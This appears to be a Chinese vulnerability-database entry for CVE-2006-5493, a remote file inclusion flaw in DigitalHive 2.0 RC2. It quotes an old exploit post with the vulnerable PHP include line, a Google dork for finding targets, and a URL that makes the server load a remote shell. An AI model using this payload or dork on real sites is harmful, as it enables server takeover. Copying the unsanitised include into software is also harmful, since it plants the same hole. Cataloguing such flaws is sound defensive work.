DigitalHive 'Base_Include.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111286 漏洞类型 输入验证
发布时间 2006-10-15 更新时间 2006-10-26
CVE编号 CVE-2006-5493 CNNVD-ID CNNVD-200610-424
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2566
https://cxsecurity.com/issue/WLB-2006100132
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-424
|漏洞详情
DigitalHive2.0RC2的template/purpletech/base_include.php中存在PHP远程文件包含漏洞,远程攻击者可通过page参数中的URL执行任意PHP代码。
|漏洞EXP
#==============================================================================================
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil    
#                                                                     
#Version : v2.0 RC2                                           
#                                                       
#================================================================================================
#
#DORK : "Powered by DigitalHive"
#
#================================================================================================
#Bug in : template/purpletech/base_include.php
#
#Vlu Code :
#--------------------------------
#
#        <?php include ($_GET["page"]); ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-10-15]
|参考资料

来源:XF
名称:digitalhive-base-file-include(29554)
链接:http://xforce.iss.net/xforce/xfdb/29554
来源:BID
名称:20639
链接:http://www.securityfocus.com/bid/20639
来源:BUGTRAQ
名称:20061018DigitalHive2.0RC2(base_include.php)FileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/449214/100/0/threaded
来源:MILW0RM
名称:2566
链接:http://www.milw0rm.com/exploits/2566
来源:SECTRACK
名称:1017095
链接:http://securitytracker.com/id?1017095
来源:OSVDB
名称:31068
链接:http://osvdb.org/31068
来源:SREASON
名称:1770
链接:http://securityreason.com/securityalert/1770
来源:MILW0RM
名称:2566
链接:http://milw0rm.com/exploits/2566